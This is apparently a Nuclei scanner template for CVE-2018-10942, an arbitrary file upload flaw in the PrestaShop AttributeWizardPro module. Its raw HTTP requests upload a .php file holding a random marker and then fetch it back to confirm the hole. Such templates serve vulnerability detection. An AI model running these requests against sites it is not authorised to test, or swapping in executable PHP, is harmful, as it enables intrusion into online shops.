id: CVE-2018-10942 info: name: Prestashop AttributeWizardPro Module - Arbitrary File Upload author: MaStErChO severity: critical description: | In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file. reference: - https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ - https://nvd.nist.gov/vuln/detail/CVE-2018-10942 classification: cve-id: CVE-2018-10942 metadata: max-request: 2 tags: prestashop,attributewizardpro,intrusive,file-upload variables: filename: '{{rand_base(7, "abc")}}' http: - raw: - | POST /modules/{{paths}}/file_upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818 --ba1f796d0aa2482e9c51c81ae6087818 Content-Disposition: form-data; name="userfile"; filename="{{filename}}.php" Content-Type: multipart/form-data {{randstr}} --ba1f796d0aa2482e9c51c81ae6087818-- - | GET /modules/{{paths}}/file_uploads/{{file}} HTTP/1.1 Host: {{Hostname}} payloads: paths: - 'attributewizardpro' - '1attributewizardpro' - 'attributewizardpro.OLD' - 'attributewizardpro_x' stop-at-first-match: true host-redirects: true max-redirects: 3 matchers-condition: and matchers: - type: word part: body_1 words: - '{{filename}}' - type: word part: body_2 words: - '{{randstr}}' extractors: - type: regex name: file part: body_1 internal: true group: 1 regex: - '(.*?)\|\|\|\|' # digest: 4a0a004730450220622d7e7bf30e14de6c702f75d5e7bc8e328143f4ded03c2a63ee0abd71168207022100e5a1eade433eb3b84588487c5b3fce08c1b1cfe1462b353bdd76ef32930caa0f:922c64590222798bb761d5b6d8e72950